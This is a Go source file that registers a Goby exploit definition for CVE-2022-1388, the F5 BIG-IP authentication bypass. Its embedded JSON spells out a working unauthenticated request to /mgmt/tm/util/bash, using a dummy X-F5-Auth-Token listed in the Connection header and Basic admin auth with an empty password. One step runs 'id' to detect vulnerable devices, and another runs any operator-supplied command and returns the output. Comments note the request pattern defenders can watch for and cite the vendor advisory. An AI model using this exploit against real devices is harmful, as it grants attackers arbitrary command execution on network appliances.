package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
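// init registers the Goby definition for CVE-2022-1388 (F5 BIG-IP) with
// ExpManager. The definition is declarative JSON; both callback arguments to
// NewExploit are nil, so presumably the ScanSteps / ExploitSteps in the JSON
// drive the requests (confirm against NewExploit).
//
// What the steps do:
//   - ScanSteps POSTs to /mgmt/tm/util/bash with "Authorization: Basic
//     YWRtaW46" (admin with an empty password), a dummy X-F5-Auth-Token, and a
//     Connection header that names X-F5-Auth-Token. A target is reported only
//     when the response code is 200 and the body contains "uid=". The check
//     is active, not passive: it runs `id` on the device.
//   - ExploitSteps sends the same request with the operator-supplied
//     "command" parameter substituted into utilCmdArgs and exposes the
//     response body as "output".
//
// For defenders: a POST to /mgmt/tm/util/bash whose Connection header lists
// X-F5-Auth-Token is the request shape this definition produces, so it is a
// useful pattern to look for in reverse-proxy and device logs. Remediation is
// described in F5 advisory K23605346, linked from the Recommendation fields.
func init() {
	// The raw string is parsed as JSON at runtime; its lines are kept at
	// column 0 so the literal's bytes are not altered by Go indentation.
	expJSON := `{
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
"Description": "<p>BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。</p>",
"Product": "BIG-IP",
"Homepage": "https://fofa.so/",
"DisclosureDate": "2022-05-11",
"Author": "",
"FofaQuery": "body=\"F5 Networks, Inc\"",
"GobyQuery": "body=\"F5 Networks, Inc\"",
"Level": "3",
"Impact": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。</span><br></p>",
"Recommendation": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">参考漏洞影响范围,目前F5官方已给出解决方案,可升级至不受影响版本或参考官网文件进行修复 </span></p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a><br></p>",
"References": [
"https://fofa.so/",
"https://support.f5.com/csp/article/K23605346"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "command",
"type": "input",
"value": "id",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/mgmt/tm/util/bash",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"X-F5-Auth-Token": "a",
"Connection": "Keep-Alive, X-F5-Auth-Token",
"Authorization": "Basic YWRtaW46",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"command\": \"run\", \"utilCmdArgs\": \"-c 'id'\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/mgmt/tm/util/bash",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"X-F5-Auth-Token": "a",
"Connection": "Keep-Alive, X-F5-Auth-Token",
"Authorization": "Basic YWRtaW46",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"command\": \"run\", \"utilCmdArgs\": \"-c '{{{command}}}'\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"命令执⾏"
],
"VulType": [
"命令执⾏"
],
"CVEIDs": [
"CVE-2022-1388"
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
"Product": "BIG-IP",
"Description": "<p>BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。</p>",
"Recommendation": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">参考漏洞影响范围,目前F5官方已给出解决方案,可升级至不受影响版本或参考官网文件进行修复 </span></p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a><br></p>",
"Impact": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。</span><br></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
"Product": "BIG-IP",
"Description": "<p style=\"text-align: justify;\">Big-ip is an application delivery service from F5 that is geared towards the world of application-centric advanced technology. Keep the application running with big-IP application delivery controller. Big-ip Local Traffic Manager (LTM) and Big-IP DNS can handle application traffic and secure the infrastructure.</p><p style=\"text-align: justify;\"></p><p style=\"text-align: justify;\">An unauthenticated attacker can use the management port or its own IP address to access the big-IP system, execute any system command, create or delete files, or disable services.</p>",
"Recommendation": "<p>F5 has published fixes for this vulnerability. Check the affected version range, then upgrade to a non-affected version or apply the mitigations described in the vendor advisory.</p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a></p>",
"Impact": "<p>An unauthenticated attacker with network access to the BIG-IP system through the management port or self IP addresses can execute arbitrary system commands, create or delete files, or disable services.</p>",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

	// The definition is registered under this source file's name.
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJSON,
		nil,
		nil,
	))
}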